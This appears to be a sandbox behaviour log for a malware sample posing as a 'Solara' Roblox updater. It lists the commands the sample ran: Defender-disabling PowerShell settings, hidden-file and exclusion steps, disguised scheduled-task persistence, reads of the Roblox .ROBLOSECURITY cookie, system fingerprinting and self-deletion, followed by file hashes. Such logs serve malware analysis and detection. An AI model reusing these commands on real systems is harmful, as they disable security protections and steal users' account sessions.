"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\system32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\svhost.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\system32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "471020934-1427772490-572142708-1711754108-114883849119215268499784406681658966023"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\system32\taskeng.exe

taskeng.exe {3E5015D7-882C-4837-9D08-B1BE7F1C1340} S-1-5-21-3691908287-3775019229-3534252667-1000:UOTHCPHQ\Admin:Interactive:[1]

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Users\Admin\AppData\Roaming\svhost.exe

C:\Users\Admin\AppData\Roaming\svhost.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 14 /tr "'C:\Windows\Globalization\MCT\MCT-ZA\Wallpaper\smss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Windows\Globalization\MCT\MCT-ZA\Wallpaper\smss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 5 /tr "'C:\Windows\Globalization\MCT\MCT-ZA\Wallpaper\smss.exe'" /rl HIGHEST /f

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zshxbpuc\zshxbpuc.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8C67.tmp" "c:\Users\Admin\AppData\Roaming\CSCFBCF61A8141645BEAB9116A612B9A.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gnve3ylj\gnve3ylj.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8CA6.tmp" "c:\Windows\System32\CSC362901114F874F39A37D2928E62229.TMP"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 14 /tr "'C:\hostNet\wscript.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wscript" /sc ONLOGON /tr "'C:\hostNet\wscript.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 10 /tr "'C:\hostNet\wscript.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "bridgeblockportComBrokerb" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\bridgeblockportComBroker.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "bridgeblockportComBroker" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\bridgeblockportComBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "bridgeblockportComBrokerb" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\bridgeblockportComBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Common Files\Services\wscript.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wscript" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\Services\wscript.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Common Files\Services\wscript.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 10 /tr "'C:\Windows\L2Schemas\WmiPrvSE.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\L2Schemas\WmiPrvSE.exe'" /rl HIGHEST /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 14 /tr "'C:\Windows\L2Schemas\WmiPrvSE.exe'" /rl HIGHEST /f

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "bridgeblockportComBrokerb" /sc MINUTE /mo 10 /tr "'C:\hostNet\bridgeblockportComBroker.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "bridgeblockportComBroker" /sc ONLOGON /tr "'C:\hostNet\bridgeblockportComBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "bridgeblockportComBrokerb" /sc MINUTE /mo 14 /tr "'C:\hostNet\bridgeblockportComBroker.exe'" /rl HIGHEST /f

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\X6ugBa7n7B.bat"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Program Files (x86)\Common Files\Services\wscript.exe

"C:\Program Files (x86)\Common Files\Services\wscript.exe"

C:\Windows\system32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\system32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\system32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\system32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Users\Admin\AppData\Roaming\svhost.exe

C:\Users\Admin\AppData\Roaming\svhost.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Roaming\svhost.exe.exe

"C:\Users\Admin\AppData\Roaming\svhost.exe.exe"

C:\Windows\Globalization\MCT\MCT-ZA\Wallpaper\smss.exe

"C:\Windows\Globalization\MCT\MCT-ZA\Wallpaper\smss.exe"

Network

Files

memory/2204-0-0x000007FEF5DC3000-0x000007FEF5DC4000-memory.dmp

memory/2204-1-0x0000000000370000-0x0000000000556000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Loader.exe

MD5 8f77f8b13b914f358059e3f7b9ddab70
SHA1 d406a28486b4dd881c454e526e149b98c0ec8462
SHA256 c22c863186e9e86a07cdb7f214c4acede216405a09d4032a603e64931f6966e6
SHA512 b00ba88d36203e389021672b39839a172b58e492bb71afb33c9f53b9ba406a0cf5d61cb5bfe6f11dc40529be8424690737ce178d7dd4981b120ec4694f51abad

C:\Users\Admin\AppData\Local\Temp\sol.exe

MD5 25daefc71be60b76cb49fc81424d768d
SHA1 48be475dd36b433d62d4f7fed9b4d81a90122dee
SHA256 1b27df9e577ab790cafdae0b1ef25ccecdf5f7e2a1ede0d83a3ca32e2987d80a
SHA512 e343905d83bdf353fe759ba5dc4de5bc2e7b1e465066bb4d09388209151e72dfd8df7da780882c533cdc3ee24933de123a8630d6a177bba0ad4d65efc39fadfe

memory/1332-12-0x0000000000EC0000-0x0000000000EEA000-memory.dmp

memory/2204-13-0x000007FEF5DC0000-0x000007FEF67AC000-memory.dmp

memory/1332-22-0x000007FEF5DC0000-0x000007FEF67AC000-memory.dmp

C:\hostNet\rlqSVEj.vbe

MD5 92408a105526970fa12ef23225de61ae
SHA1 bf70e8e671c10bf85771b2b8dd4549766cf79582
SHA256 b4f3f50e48c35a2d03d9e96175722f1c4669e8529c2347f4f17377b2ad726b10
